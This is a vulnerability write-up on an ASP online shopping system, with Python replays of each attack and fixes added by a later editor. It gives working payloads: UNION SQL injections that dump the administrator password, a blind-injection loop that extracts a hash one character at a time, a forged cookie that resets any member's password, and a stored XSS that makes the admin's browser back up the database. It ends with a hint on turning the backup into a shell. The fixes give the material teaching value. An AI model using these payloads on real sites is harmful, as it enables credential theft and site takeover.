A brief vulnerability analysis of the Web Soft online shopping system - Vulnerability Alert - The Black Bar Safety Net

ID MYHACK58:62201026835
Type myhack58
Reporter 佚名
Modified 2010-05-03T00:00:00


Author: ninty

A terrible set of programs. I am not too familiar with ASP, so if anything here is written wrongly, please point it out, experts!

Injection: three injectable places were found.

1. Products.asp, in the product browsing page. The code is as follows:

```asp
<%
set rss=server.CreateObject("adodb.recordset")
' the id parameter is concatenated straight into the SQL statement; this is where the injection occurs
rss.open "select * from products where bookid="&request.querystring("id"),conn,1,3
if rss.eof or rss.bof then
    response.write "<script>alert('sorry, no such product!');history.go(-1);</script>"
    response.end
end if
dim des
if not rss("metad")="" then des=rss("metad") end if
if not rss("metak")="" then keya=rss("metak") end if
%>
<title><%=webname%>--Product Details</title>
<!-- meta tags and the css.css stylesheet link omitted -->
```

```html
<script>
<!--
function OpenNews() {
    window.name = "news";
    win = window.open('', 'newswin', 'left=110,width=600,height=420,scrollbars=1');
}
//-->
</script>
```

```asp
<%
' the numeric check only comes here, after the query above has already been executed
if IsNumeric(request.QueryString("id"))=False then
    response.write("<script>alert(""unauthorized access!"");location.href=""index.asp"";</script>")
    response.end
end if
%>
```

Here is the interesting point: the id is only checked for being numeric after the database has already been queried, so the check protects nothing. I do not know what this programmer was thinking! The injection statement is constructed as follows:

http://localhost/shangwu/products.asp?id=353 union select'1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1',admin,password,'1','1' from admin

I use Firefox with JavaScript disabled, because the JavaScript emitted after the query would otherwise interfere with seeing the result. After submitting, view the page source to get the administrator account and password:

![screenshot: administrator account and password in the page source](/Article/UploadPic/2010-5/201053223037662.jpg)

2. Getpwd2.asp, in the password retrieval function. The code is as follows:

```asp
<%
username=request.form("username")   ' the username value is taken straight from the form
set rs=Server.CreateObject("Adodb.Recordset")
sql="select * from [YX_User] where name='"&username&"' "   ' the concatenated statement is executed; this is where the injection occurs
rs.open sql,conn,1,1
If rs.eof Then
%>
... omitted ...
<%if rs("Clue")<>"" then%>
Question: <%=rs("Clue")%>   <!-- the Clue column is output here, so we can make it output any column we want -->
```

In the password retrieval box, enter:

admin' union select '1','1','1',password,'1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1' from admin where "='

![screenshot: the injected username in the password retrieval form](/Article/UploadPic/2010-5/201053223040632.jpg)

Next, the administrator password is obtained directly:

![screenshot: the administrator password shown in the Question field](/Article/UploadPic/2010-5/201053223040460.jpg)
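
The two UNION injections above (Products.asp and Getpwd2.asp) rely on the same two things: guessing how many columns the original SELECT returns, and re-balancing the quoting around the injected text. The following is an added example, not code from the page or from the shop's author, that replays both against a constructed SQLite stand-in for the shop's database. The table layout, column names other than those the page names (bookid, metad, metak, Clue, admin, password, [YX_User]) and the hash values are invented; the real products table needed 53 filler columns in the page's payload, the stand-in needs four. SQLite is used only because it runs offline; the page's backend is Access.

```python
import sqlite3

# Constructed in-memory stand-in for the shop's Access database; the column layout
# is invented (the real products table needed 53 columns in the page's payload).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(bookid INTEGER, name TEXT, metad TEXT, metak TEXT);
        INSERT INTO products VALUES (353, 'Widget', 'widget desc', 'widget,keys');
        CREATE TABLE YX_User(id INTEGER, name TEXT, Clue TEXT, password TEXT);
        INSERT INTO YX_User VALUES (7, 'ninty', 'first pet', 'e10adc3949ba59abbe56e057f20f883e');
        CREATE TABLE admin(id INTEGER, admin TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'admin', '21232f297a57a5a743894a0e4a801fc3');
    """)
    return conn

def products_vulnerable(conn, product_id):
    """Mirror of Products.asp: id goes into the statement unquoted, the meta tags
    are rendered from the first row, and IsNumeric() is only checked afterwards."""
    row = conn.execute("select * from products where bookid=" + product_id).fetchone()
    metad, metak = (row[2], row[3]) if row else ("", "")
    page = "<meta name='description' content='%s'><meta name='keywords' content='%s'>" % (metad, metak)
    if not product_id.isdigit():
        # Too late: the stolen row is already in the response. With JavaScript
        # disabled the redirect is inert and the page source shows it.
        page += "<script>alert('unauthorized access!');location.href='index.asp';</script>"
    return page

def getpwd_vulnerable(conn, username):
    """Mirror of Getpwd2.asp: a quoted string field whose Clue column is echoed."""
    row = conn.execute("select * from [YX_User] where name='" + username + "'").fetchone()
    return row[2] if row else None

def union_payload(ncols, table, wanted):
    """Right-hand side of the UNION: ncols columns, the wanted column names at the
    given 0-based positions and the filler '1' everywhere else, as on the page."""
    cols = ["'1'"] * ncols
    for pos, name in wanted.items():
        cols[pos] = name
    return "union select " + ",".join(cols) + " from " + table

def find_column_count(query, max_cols=100):
    """Grow the UNION until the database stops rejecting the column mismatch.
    The page's 53 quoted '1's were found the same way by hand."""
    for n in range(1, max_cols + 1):
        try:
            query("0 " + union_payload(n, "admin", {}))
            return n
        except sqlite3.OperationalError:
            continue
    return None

def steal_via_products(conn):
    """id=0 selects no real product, so the UNION row is the first (and only) row."""
    ncols = find_column_count(lambda p: products_vulnerable(conn, p))
    return products_vulnerable(conn, "0 " + union_payload(ncols, "admin", {2: "admin", 3: "password"}))

def steal_via_getpwd(conn):
    """The field is quoted: open the quote, append the UNION, and re-balance the
    trailing quote with where ''='' (the suffix the page shows as where "=')."""
    payload = "nobody' " + union_payload(4, "admin", {2: "password"}) + " where ''='"
    return getpwd_vulnerable(conn, payload)

def products_fixed(conn, product_id):
    """Validate before querying and bind the value; the payloads above no longer work."""
    if not product_id.isdigit():
        raise PermissionError("unauthorized access!")
    return conn.execute("select * from products where bookid=?", (int(product_id),)).fetchone()
```

The column-count loop is the part worth keeping: a mismatched UNION is rejected by the database, so counting up until the error disappears is exactly the manual trial the page's 53 quoted literals record. products_fixed shows the only ordering that works: check the input, then bind it, rather than querying first and checking afterwards as Products.asp does.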

3. Register.asp, in the user registration function:

```asp
set rs=server.CreateObject("adodb.recordset")
' useremail and username are taken directly from the request and appended to the SQL statement
rs.open "select * from [YX_User] where Mail='"&trim(request("useremail"))&"' or Name='"&trim(request("username"))&"'",conn,1,1
if rs.recordcount>0 then   ' if the query returns more than zero records
    call usererr()         ' call usererr()
    rs.close
else
```

The content of usererr() is:

```asp
sub usererr()
    response.write ""   ' (markup omitted)
    response.write ""   ' (markup omitted)
    response.write " · * User registration failed! · The username or e-mail address you entered already exists, please go back and re-enter! · Return to the previous page"
end sub
```

We can exploit the useremail field. Enter a username that does not exist together with a non-existent e-mail address, then append our injected statement to the e-mail. If the page reports that the username or e-mail already exists, the SQL condition we attached is true; otherwise it is false. As shown in the figure:

![screenshot: the registration form with the injected e-mail](/Article/UploadPic/2010-5/201053223040421.jpg)

What is entered in the EMAIL field:

321564654@123.com ' or exists (select * from admin) or "<>'

Result: because the admin table exists, the "already exists" error is shown; if admin is changed to aa, a blank page is seen after submission.

![screenshot: the registration failure message](/Article/UploadPic/2010-5/201053223041908.jpg)
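
What Register.asp leaks is a single bit per request (the "already exists" message or a blank page), which is the boolean-based blind case. The following is an added example, not code from the page or from the shop's author, that turns that bit into an oracle over a constructed SQLite stand-in and pulls a column out character by character. The schema, the member row and the admin hash are invented; the e-mail construction is the page's, written with two single quotes where the page shows a double quote; substr() is SQLite's, and against the page's Access backend the equivalent is Mid(). The extraction loop generalizes beyond the page's single exists() probe.

```python
import sqlite3

# Constructed stand-in for the shop's database (schema invented): the member table
# Register.asp checks and the admin table the injected subquery asks about.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE YX_User(id INTEGER, Name TEXT, Mail TEXT);
        INSERT INTO YX_User VALUES (7, 'ninty', 'ninty@example.com');
        CREATE TABLE admin(id INTEGER, admin TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'admin', '21232f29');
    """)
    return conn

def register_vulnerable(conn, username, useremail):
    """Mirror of Register.asp: both fields are concatenated into the statement.
    The only thing the attacker sees is usererr() or a blank page; a database
    error (the page's non-existent 'aa' table) also ends as a blank page."""
    sql = ("select * from [YX_User] where Mail='" + useremail.strip() +
           "' or Name='" + username.strip() + "'")
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        return ""
    if len(rows) > 0:
        return "user registration failure! The username or e-mail address already exists"
    return ""

def oracle(conn, condition):
    """True when the injected condition holds. The e-mail is the page's
    "' or exists (...) or ''<>'" construction with an arbitrary condition slotted in."""
    email = "321564654@123.com' or (" + condition + ") or ''<>'"
    return register_vulnerable(conn, "nosuchuser", email) != ""

def extract(conn, table, column, alphabet="0123456789abcdef", max_len=64):
    """Recover a column one character at a time through the yes/no oracle.
    substr() is SQLite's; against the page's Access backend you would use Mid()."""
    value = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            cond = "exists (select * from %s where substr(%s,%d,1)='%s')" % (table, column, pos, ch)
            if oracle(conn, cond):
                value += ch
                break
        else:
            return value   # no character matched: the value ended at pos-1
    return value

def register_fixed(conn, username, useremail):
    """Bound parameters: the quote in the e-mail is data, not syntax, and the
    or-clause never reaches the parser."""
    rows = conn.execute("select * from [YX_User] where Mail=? or Name=?",
                        (useremail.strip(), username.strip())).fetchall()
    return len(rows) > 0
```

The trailing `''<>'` is a deliberately false clause whose only job is to absorb the closing quote the page appends; everything the attacker cares about is the parenthesised condition in front of it. Each character costs at most one request per alphabet symbol, so a 32-character MD5 hash takes well under a thousand registrations.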

Changing any user's password: on the member password modification page, look at how the request is processed:

```asp
action=request.QueryString("action")
username=request.cookies("Cnhww")("username")   ' the username is taken from the cookie
select case action
... omitted ...
case "savepass"
    set rs=server.CreateObject("adodb.recordset")
    rs.open "select * from [YX_User] where name='"&username&"'",conn,1,3
    if trim(request("userpassword"))<>"" then
        rs("password")=md5(trim(request("userpassword")))   ' if userpassword is not empty, the password is changed
    end if
    rs.update
    rs.close
    set rs=nothing
    response.Write "<script>alert('password changed successfully!');window.location.href='"&request.servervariables("http_referer")&"';</script>"
    response.End
... omitted ...
end select
```

So we can forge the cookie to change any member's password. First log into the member center with our own registered user, click change password, and open WSE to capture the packet. Captured:

![screenshot: the captured password-change request](/Article/UploadPic/2010-5/201053223041834.jpg)

Change username=ninty to username=admin; here we are changing the password of the user admin. userpassword=123456&userpassword2=123456 sets that password to 123456. This admin is just a regular user, not the backend administrator; administrator information is not stored in this table. Save and submit with nc.

![screenshot: the modified request submitted with nc](/Article/UploadPic/2010-5/201053223041679.jpg)

Log in on the front end with 123456. Success!

![screenshot: logged in as admin on the front end](/Article/UploadPic/2010-5/201053223041941.jpg)
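
The root cause in the savepass branch is that the identity used for the update is whatever the client wrote into the Cnhww cookie. The following is an added example, not code from the page or from the shop's author, that replays the cookie edit against a mirror of that handler and against a hypothetical fix in which the server signs the username it issued at login with an HMAC and refuses any cookie whose tag does not verify. The member table, the passwords and SERVER_KEY are constructed for the example; a server-side session store keyed by a random token would serve equally well.

```python
import hashlib
import hmac
import secrets

def md5(text):
    # MD5 is kept only because that is what the page's savepass code stores.
    return hashlib.md5(text.encode()).hexdigest()

# Constructed member table standing in for [YX_User]: name -> md5(password).
def build_users():
    return {"ninty": md5("ninty-pass"), "admin": md5("original-admin-pass")}

def savepass_vulnerable(cookies, users, userpassword):
    """Mirror of the savepass branch: whoever the Cnhww cookie names gets the new password."""
    username = cookies.get("username")
    if username in users and userpassword.strip() != "":
        users[username] = md5(userpassword.strip())
        return username
    return None

# Hypothetical fix: the server signs the username it issued at login, so a cookie
# edited to say admin no longer verifies. SERVER_KEY is an assumed server-side secret.
SERVER_KEY = secrets.token_bytes(32)

def issue_cookie(username):
    mac = hmac.new(SERVER_KEY, username.encode(), hashlib.sha256).hexdigest()
    return username + "|" + mac

def verify_cookie(value):
    """Return the username only if its MAC checks out (constant-time compare)."""
    username, sep, mac = value.partition("|")
    if not sep:
        return None
    expected = hmac.new(SERVER_KEY, username.encode(), hashlib.sha256).hexdigest()
    return username if hmac.compare_digest(mac, expected) else None

def savepass_fixed(cookies, users, userpassword):
    username = verify_cookie(cookies.get("username", ""))
    if username is None or username not in users or userpassword.strip() == "":
        return None
    users[username] = md5(userpassword.strip())
    return username

def forged_cookie_demo():
    """Replays the page's attack against both handlers; returns who got changed."""
    users = build_users()
    forged = {"username": "admin"}                       # the edited capture: ninty -> admin
    changed_vuln = savepass_vulnerable(forged, users, "123456")
    users = build_users()
    tampered = {"username": issue_cookie("ninty").replace("ninty", "admin", 1)}
    changed_fixed = savepass_fixed(tampered, users, "123456")
    honest = {"username": issue_cookie("ninty")}
    changed_honest = savepass_fixed(honest, users, "123456")
    return changed_vuln, changed_fixed, changed_honest
```

Note that the fix does not need to know anything about the attack: the cookie still carries a username in the clear, but editing it invalidates the tag, so the savepass branch falls through before the UPDATE. Re-checking the current password before accepting a new one is a further, independent control the page's code also lacks.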

Cross-site scripting: the problem is in the member messaging page, mymsg_hand1.asp:

```asp
set rs=Server.CreateObject("ADODB.recordset")
sql="select * from sms where (name='Administrators' or name='admin') and zuti='0' order by riqi desc"
rs.open sql,conn,1,3
if rs.eof and rs.bof then
    response.write "Inbox has no messages."
else
    ... omitted ...
    do while not rs.eof and pages>0
        neirong=rs("neirong")
        riqi=rs("riqi")
        isnew=rs("isnew")
        fname=rs("fname")
        id=rs("id")
        if pages<10 then response.write ""
%>
... omitted ...
<%=replace(neirong,vbCRLF,"<br>")%>
```

On output only the carriage return is replaced (with a line-break tag); nothing else is encoded. So as long as the cross-site code we write contains no carriage returns, it goes through untouched. In the message we wrote:

```javascript
var op = window.open('backdata.asp');
setTimeout("back()", 2000);
function back() {
    var form = op.document.forms[0];
    form.DBpath.value = "../bbs/data/#wrtxcnshop.asp";
    form.bkDBname.value = "test.mdb";
    form.submit();
}
```

So when the administrator views the message, the database backup page is opened automatically and a backup is made; the backup generates a test.mdb in the databackup directory.

![screenshot: test.mdb generated in the databackup directory](/Article/UploadPic/2010-5/201053223042736.jpg)
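
The message page's only transformation is replace(neirong,vbCRLF,"<br>"), which is why the payload above is written on one line. The following is an added example, not code from the page or from the shop's author, that mirrors that output step beside a hypothetical fix that HTML-encodes the stored message first (what Server.HTMLEncode does in ASP) and only then turns line breaks into <br>. The payload is the page's script, wrapped in a script tag here, and the "live script" check is a constructed approximation of what the administrator's browser would execute.

```python
import html
import re

def render_message_vulnerable(neirong):
    """Mirror of mymsg_hand1.asp output: only CRLF is rewritten to a line-break tag,
    nothing else in the stored message is encoded."""
    return neirong.replace("\r\n", "<br>")

def render_message_fixed(neirong):
    """Hypothetical fix (not the page's code): HTML-encode the whole message first,
    then turn line breaks into <br>; the <br> is inserted after encoding so it survives."""
    return html.escape(neirong, quote=True).replace("\r\n", "<br>")

# The page's payload on a single line, wrapped in a script tag here, so the CRLF
# replacement never touches it.
PAYLOAD = (
    "<script>var op=window.open('backdata.asp');setTimeout(\"back()\",2000);"
    "function back(){var form=op.document.forms[0];"
    "form.DBpath.value='../bbs/data/#wrtxcnshop.asp';"
    "form.bkDBname.value='test.mdb';form.submit();}</script>"
)

_SCRIPT = re.compile(r"<script\b", re.IGNORECASE)

def executes_script(rendered):
    """Crude check for what the administrator's browser would run: a live <script> tag."""
    return _SCRIPT.search(rendered) is not None

def multiline_variant():
    """Why the payload must avoid line breaks even on the vulnerable page: a CRLF
    inside the script becomes <br>, which is a syntax error once the script runs."""
    return render_message_vulnerable("<script>alert(1);\r\nalert(2);</script>")
```

The order of operations in render_message_fixed matters: encoding after inserting <br> would neutralise the line breaks along with the payload, while encoding first leaves the application's own markup intact and the attacker's inert.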

There are many other vulnerabilities; interested friends can look through the code themselves... To get a shell: break into the backend, upload a picture, and use the backup function on it.